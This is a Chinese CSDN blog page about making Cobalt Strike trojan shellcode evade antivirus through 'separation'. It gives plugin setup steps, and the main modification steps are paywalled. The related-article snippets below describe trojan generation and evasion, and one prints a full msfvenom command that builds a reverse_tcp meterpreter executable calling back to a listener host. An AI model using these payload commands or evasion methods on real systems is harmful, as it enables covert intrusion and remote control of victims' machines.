怎么生成木马_免杀系列CS木马shellcode分离免杀上线

最新推荐文章于 2024-07-14 18:18:00 发布
最新推荐文章于 2024-07-14 18:18:00 发布
阅读量3.3k 收藏 3
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39970668/article/details/111707253
版权
本文介绍了如何使用Golang和CS(Cobalt Strike)生成并免杀shellcode。通过在main函数添加延时、动态获取shellcode和密钥、利用HTTP服务器存储关键数据,实现木马的免杀上线。文章提供了改造源代码的步骤,包括编译成exe文件并测试沙箱未检测出恶意行为。
摘要由CSDN通过智能技术生成

10月13日

CS木马shellcode分离免杀上线

353e1545156ec9dc7f1cb012f1b77ae8.png

最近在学习CS怎么去免杀,今天来分享一下吧,反正有手就行呗

353e1545156ec9dc7f1cb012f1b77ae8.png 0x00  Article directory [ 目录结构] 0x01 环境介绍 0x02 插件部署 0x03 改造流程 0x04 测试效果

0x05 总结

353e1545156ec9dc7f1cb012f1b77ae8.png 0x01  环境介绍

本次免杀所使用的是shellcode分离免杀技术

CS版本:4.0语言:Golang

插件:项目地址:

http://github.com/hack2fun/BypassAV
353e1545156ec9dc7f1cb012f1b77ae8.png 0x02  插件部署

1、打开cs客户端,点击如图位置:

7d21aa4b8127d001f557c7ba4f234ef2.png

2、点击load,加载插件:

ab676bbb08406bb96b5cc05037884b3d.png

3、加载完毕后使用快捷键ctrl + g 即可打开窗口进行生产CS木马

a82e99f75963c96f176d491358eeabe9.png

353e1545156ec9dc7f1cb012f1b77ae8.png 0x03  改造流程
最低0.47元/天 解锁文章
weixin_39970668
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
渗透测试教学之MSF生成木马
weixin_45109326的博客
08-20 3290
msfvenom是msf中的一个独立的负载生成器,它可以利用msf中的payloads和encoders来生成各种格式的木马文件,并在目标机上执行,配合meterpreter在本地监听上线。msfvenom是msfpayload和msfencode的结合体,可以一步完成负载生成和编码免杀的操作。
通过Python实现Payload分离免杀过程详解
09-16
### 通过Python实现Payload分离免杀过程详解 在网络安全领域,Payload分离技术是一种常见的方法,用于提高恶意软件的隐蔽性和生存能力。本文旨在详细介绍如何利用Python实现Payload的分离免杀,通过具体示例帮助...
CS使用之生成钓鱼网站和生成木马进行后渗透操作
jxy158212的博客
08-16 2336
使用CS生成钓鱼网站、生成木马进行后渗透操作
cs木马制作与于远程控制
最新发布
2301_79580906的博客
07-14 394
cs木马制作与远控
Metasploit -- 生成木马(msfvenom)
weixin_41489908的博客
03-03 1172
男孩子都是铁的,你不用考虑他们的感受,他们真的不累,真的,真的不累。。。 ---- 网易云热评 作用:生成木马文件 1、msfvenom 相关参数介绍 -p, --payload <payload> 指定需要使用的payload(攻击荷载) -l, --list [module_type] 列出指定模块的所有可用资源,模块类型包括: payloads, encoders, nops, all -n, --nopsled <length> 为payload预先指定一个N.
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
msfvenom使用和生成木马
qq_53030229的博客
05-13 1477
msfvenom生成木马一、msfvenom命令使用二、使用步骤1.引入库2.读入数据总结 一、msfvenom命令使用 -l, --list 列出[type]的所有模块。 类型是:有效载荷,编码器,点,platforms, archs, encrypt, formats, all -p, --payload <payload> Payload to use (--list payloads to list, --list-options for arg
CS木马免杀技巧分享.pdf
08-11
01Shellcode加载器 02 Powershell免杀 03 利用场景介绍
源码免杀-花指令
08-21
3. **免杀技术的应用**:免杀不仅仅局限于花指令,还包括其他多种技术,如API混淆、壳代码(Shellcode)隐藏、虚拟机绕过等。这些技术组合使用,可以构建更复杂的免杀策略。例如,使用API混淆技术可以改变函数调用的...
关于域渗透与免杀对抗思考及其常见方式
03-16
- **Shellcode免杀**:Shellcode是一种小型代码片段,通常用于远程执行任意代码。免杀技术旨在使Shellcode能够在不被检测的情况下执行。 #### 五、免杀对抗策略 为了有效对抗域渗透攻击,企业和组织需要采取一系列...
CS-Loader:CS免杀
03-22
CS-避免杀CS免杀,包括python版和C版本的(经测试Python打包的方式在win10上存在bug,无法运行,Win7测试无异常 V1.0:目前测试可以过Defender /火绒的静杀+动杀,360还没测= =不想装360全家桶了,可以自行测试 下一步开发计划: V1.5:加入C版本CS免杀(已完成) V1.7:加入Powershell免杀(已完成) V2.0:开发出UI界面 V2.0:开发成在线免杀平台(已完成) PS:在实际使用中发现图形化界面不利于和其他工具结合,引用之下命令行的方式更具有扩展性 关于自己写的在线免杀平台,暂不考虑开源,主要是觉得当前的技术还比较薄弱,如果有师傅想体验可以联系我 V3.0:想办法结合更多免杀技术(想去研究下进程注入/文件捆绑,不知道免杀效果怎样) V3.1增加了go版本(可过火绒/ 360 / defender) 依赖环境 Pyt
免杀对抗-ShellCode上线+回调编译执行+混淆变异算法
xiaoheizi的博客
09-10 3183
shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。我们经常在CS里面生成指定编程语言的payload,而这个payload里面就是一段十六进制的机器码。2.将shellcode放到执行脚本中(使用的调用执行方式是:申请动态内存加载),利用C/C++语言编译成exe执行文件。因为shellcode免杀手段多,损坏的可能性小,能自定义更多选择。3.将新的shellcode放到自写的执行脚本xor.cpp中,使用。
metasploit生成木马获取windowns控制权(非免杀版)
奇葩
12-06 987
转载连接:https://zhuanlan.zhihu.com/p/66785692 写在前面 本想介绍几种生成免杀木马的方法,但经过实验发现这几种方法已经失效,可以被360或者腾讯安全管家查杀。所以本文的木马不具备免杀功能。 准备环境: 入侵机器:kali linux (IP地址:192.168.96.128) 靶机:window server 2003 (IP地址:192.168.96.1...
Metasploit -- 木马生成原理和方法
weixin_41489908的博客
05-07 2218
以前的人,要疯要癫要崩溃,都特别戏剧化,比如披头散发,涕泗横流,瞠目结舌等等。现在的人不会,他就静静地坐在那里,面无表情,不声不响,看着很正常,但禁不起触碰。你上前轻轻碰一下,问一句,他就垮了,就崩溃了。。。 ---- 网易云热评 一、生成方式:利用msf模块中的msfvenom模块 二、原理:msfvenom是msfpayload、msfencode的结合体,利用msfvenom生成木马...
逆向CS生成的exe马
weixin_43781139的博客
03-01 2412
前言 Cobalt Strike(以下简称CS)是红队在渗透攻击中的一款神器,使用稳定,功能全面。本文是对CS生成的exe文件进行分析,看看CS生成木马有什么高明之处。 准备工作 工具准备:Cobalt Strike ida x32dbg exeinfope CS生成木马有很多种,如下图所示: 这里我不一一介绍,有兴趣的同学自行去研究。我们这里先选择Windows Executable 注: Windows Executable 生成可执行的分段payloa...
CS分离免杀实践
痴人说梦梦中人
08-02 2190
CS分离免杀实战一、原理简述二、环境配置三、本地测试1.生成shellcode2.代码变形3.pyinstaller打包4.免杀测试 本次实践参考小刚师傅的教程,详细原理请看原文:https://mp.weixin.qq.com/ 一、原理简述           通过python requests远程下载经过base64编码后的shellcode和loader,然后解码通过exec函数先执行loader,
cs木马
qq_42242380的博客
04-26 1307
如果你是个CS玩家,那你就要小心了!因为现存可访问的CS1.6服务器中,有39%是容易被黑客攻击的恶意服务器。一个网络安全研究团队Dr.Web已经给关闭了一些黑客的恶意游戏服务器,这些恶意游戏服务器可以通过cs玩家的游戏客户端,利用零日漏洞悄无声息的感染他们的电脑。 据研究人员反映,CS1.6,一个二十多年的老游戏,存在多个应用补丁的远程执行代码,以及客户端的多个漏洞。用户一旦连接上恶意服务器,黑...
CS -exe木马分析
weixin_45880501的博客
04-05 2958
CS -exe木马分析 Cobalt Strike是渗透测试工具,可以通过exe木马实现远程控制。 一:生成exe Windows Executable 生成可执行exe木马;payload分段 Windows Executable(S) 生成无状态的可执行exe木马,payload不分段 分析Windows Executable 生成的artifact.exe 查壳:无壳 二:具体分析 401840关键函数:获取系统时间戳,通过sprintf拼接管道名,创建线程,写加密数据到创建的管道内,最后解密执行
域渗透与免杀策略:提升网络安全防护
同时,Shellcode免杀技术也被用于逃避安全软件的扫描,使得攻击者能够在不被发现的情况下执行恶意代码。 文章深入讨论了如何通过这些技术手段进行对抗,以及如何通过强化安全策略、实施有效的防护措施,如更新补丁...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值